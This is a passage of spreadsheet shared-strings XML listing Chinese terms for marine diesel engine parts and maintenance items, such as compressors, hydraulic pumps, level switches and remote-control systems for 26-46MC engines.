      </rPr>
      <t>检查和清洗</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力千分表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力清洁铭牌</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力软管布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力试验装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力调节阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力调节器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力调整器的安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力指示器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力指示器布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力转换器布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压气机的水洗</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压气机机壳</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压气机进口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压气机净化系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压气机壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压气机轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压缩比垫</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压缩侧插芯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压缩垫片</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压缩环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压缩机，工作空气</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压缩机，起动空气</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压缩机清洗设备</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压缩空气</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压缩空气过滤网套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压缩空气马达</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压缩空气系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压缩轮冲洗</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压缩效率的计算</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压缩压力的</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>ISO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>修正</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>延伸管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>延时器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>延长杆</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>研磨板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>研磨棒</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>研磨工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>研磨工具，可选</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>研磨工作台安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>研磨工作台导套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>研磨工作台总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>研磨机，部件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>研磨轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>研磨台</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盐水冷却器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>验收标准</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>摇臂轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>摇臂装配，进气</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>摇臂装配，排气</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>遥测连接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>遥控</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>I/O</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>遥控安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>遥控控制前进，后退，定距浆</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> 26-46MC/MC-C</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>遥控控制停车，定距浆</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> 26-46MC/MC-C</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>遥控控制停车，启动，安全系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>遥控控制停车，启动，可变浆</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> 26-46MC/MC-C</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>遥控启动布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>遥控图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>遥控温度计支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>遥控系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>遥控显示器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>遥控箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液位报警器箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液位传感器调整和测试</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液位开关</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液位开关</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>低液位动作</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液位开关</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高液位动作</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液位开关功能测试</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液位开关继电器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液位指示器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>H.-CLEAR</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铭牌</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压安全阀</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压泵</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1500</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压泵</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2400</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压泵</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>700</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压泵单元质量规程</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压泵蓄电池组</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压泵质量规范</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压部件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压顶部支撑的说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压顶撑螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压动力供应</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压动力供应工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压动力供应驱动</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压动力提供箱放泄</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压动力系统增压泵单元</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压动力装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压动力装置尺寸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压动力装置的挠性软管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压阀本体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压分配器块质量规程</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压缸单元</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压高压管</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压工具，地脚</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端垫螺栓</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环氧树脂</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压工具，地脚</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端垫螺栓</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铁垫</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压工具，地脚螺栓</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铁垫</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
